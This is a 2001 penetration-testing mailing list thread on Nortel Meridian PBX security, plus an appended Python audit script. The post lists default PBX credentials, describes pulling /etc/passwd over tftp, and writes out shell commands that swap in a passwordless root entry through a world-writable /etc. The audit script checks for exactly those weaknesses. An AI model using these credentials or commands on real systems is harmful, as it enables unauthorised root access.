Penetration Testing mailing list archives
Re: Nortel Security
From: H D Moore <hdm () secureaustin com>
Date: Sat, 30 Jun 2001 12:54:05 -0500
If the PBX is hooked into the actual network, there are quite a few ways to get access to the system. The easiest method is to tftp the /etc/passwd file off the system and crack the hashes. If you go this route, you will get a user account called "service" with a password of "smile" ;)

If you log into the system with this account, you will notice that /etc is mode 0777, so getting root access is trivial:

$ echo "root::0:0:root:/root:/bin/sh" > /etc/mah_passwd
$ mv /etc/passwd /etc/passwd.bak
$ mv /etc/mah_passwd /etc/passwd
$ su root
# mv /etc/passwd.bak /etc/passwd

I don't remember which version of this system it was, but the client software that came with it was called "Meridian Terminal Emulator". You could manage the PBX with this by first logging in with 0000/0000 then giving it the manager password of "9999".

I really wish I had more time to write up the stuff I find out there...

-HD

On Saturday 30 June 2001 06:22 am, G A Evans wrote:
Try http://support.dialogic.com/ and search for meridian. There is quite a bit of programming information.

You can also try a login of 0000 and password of 0000 for the Nortel Meridian 1 PBX OS Release 2.

Tony Barnett
abarnettremovethisbit () ndirect co uk
--------------------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service.
For more information on SecurityFocus' SIA service, which automatically alerts you to the latest security vulnerabilities, please see: https://alerts.securityfocus.com/
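
A host audit for the two conditions the message above relies on, a world-writable /etc and a passwd entry with an empty password field. This is an added example, not part of the original message; the function names and the sample entries other than the quoted root line are constructed.

```python
import os
import stat

# Constructed sample in passwd(5) format; line 1 is the entry quoted in the post.
SAMPLE_PASSWD = """\
root::0:0:root:/root:/bin/sh
service:x:100:100:service:/home/service:/bin/sh
toor:x:0:0:constructed:/root:/bin/sh
"""


def audit_passwd_text(text):
    """Flag empty password fields and non-root UID 0 accounts."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(f"line {lineno}: malformed entry")
            continue
        name, password, uid = fields[0], fields[1], fields[2]
        if password == "":
            findings.append(f"line {lineno}: {name} has an empty password field")
        if uid == "0" and name != "root":
            findings.append(f"line {lineno}: {name} has UID 0")
    return findings


def audit_etc(etc_dir="/etc"):
    """Flag a world-writable directory or passwd file, then audit the entries."""
    findings = []
    passwd_path = os.path.join(etc_dir, "passwd")
    for path in (etc_dir, passwd_path):
        mode = stat.S_IMODE(os.stat(path).st_mode)
        if mode & stat.S_IWOTH:
            # Without the sticky bit, any user can rename files in the directory.
            note = " with sticky bit" if mode & stat.S_ISVTX else ""
            findings.append(f"{path} is world-writable (mode {mode:04o}{note})")
    with open(passwd_path, encoding="utf-8", errors="replace") as fh:
        findings.extend(audit_passwd_text(fh.read()))
    return findings


if __name__ == "__main__":
    for finding in audit_passwd_text(SAMPLE_PASSWD):
        print(finding)
```

Calling `audit_etc()` with no argument checks the live /etc on the host it runs on.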